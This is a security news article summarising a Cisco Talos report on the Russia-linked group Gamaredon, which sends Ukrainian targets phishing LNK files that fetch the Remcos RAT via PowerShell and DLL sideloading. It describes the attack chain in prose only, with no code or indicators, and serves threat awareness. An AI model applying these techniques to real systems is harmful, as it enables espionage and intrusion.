Russia-linked Gamaredon Targets Ukraine with Remcos RAT
Researchers at Cisco Talos have detected a sophisticated cyberespionage campaign targeting Ukrainian entities, carried out by the Russia-linked APT group Gamaredon. The attackers have been using a phishing campaign to deploy the Remcos RAT (Remote Access Trojan) via PowerShell downloader, exploiting troop-related lures to gain access to the victims' systems.
Gamaredon, also known as Armageddon, Primitive Bear, ACTINIUM, or Callisto, has been launching cyber-espionage campaigns against Ukraine since at least 2014. This latest campaign has been active since November 2024 and involves distributing LNK files compressed inside ZIP archives, often disguising the file as an Office document and using names related to the military invasion.
The malicious LNK files contain PowerShell code that downloads the next stage payload and a decoy file to disguise the infection. The attackers have been using custom scripts and tools, but have recently been observed employing the Remcos backdoor in their campaigns. The attack involves downloading a ZIP payload from servers, extracting it to the %TEMP% folder, and executing a seemingly clean application that loads a malicious DLL via DLL sideloading.
The PowerShell scripts used to download the ZIP files suggest abuse of legitimate applications for DLL sideloading and contain a mix of clean and malicious files. For example, one sample downloaded by "Any.run" contains the clean application TivoDiag.exe, as well as two DLLs, including the malicious "mindclient.dll". This DLL is loaded by "TivoDiag.exe" during execution, indicating a sophisticated level of obfuscation.
Interestingly, the servers hosting the ZIP files only respond to requests from Ukraine, while connections from Germany and Russia return HTTP 403 errors, possibly restricting access to Ukrainian victims. Researchers have also noticed that the servers were still hosting files for specific regions, suggesting a targeted approach by the attackers.
Threat Actor Profile
Gamaredon is a highly sophisticated APT group known for its long series of spear-phishing attacks targeting Ukrainian entities and organizations related to Ukrainian affairs. The attackers have been launching cyber-espionage campaigns against Ukraine since at least 2014, indicating a high level of expertise and resources.
Indicators of Compromise (IoCs) and Detection
Cisco Talos has included Indicators of Compromise (IoCs) for this threat in their report, as well as Snort rules for its detection. These IoCs can help organizations identify potential threats and take proactive measures to protect themselves.
Conclusion
The recent campaign by Gamaredon highlights the evolving nature of cyberespionage threats. As attackers continue to adapt and evolve their tactics, it is essential for organizations to remain vigilant and implement robust security measures to detect and prevent such attacks. By staying informed about emerging threats like Remcos RAT, organizations can better protect themselves against sophisticated cyberattacks.
Follow us on Twitter: @securityaffairs and Facebook and Mastodon for the latest news and updates on cybersecurity threats.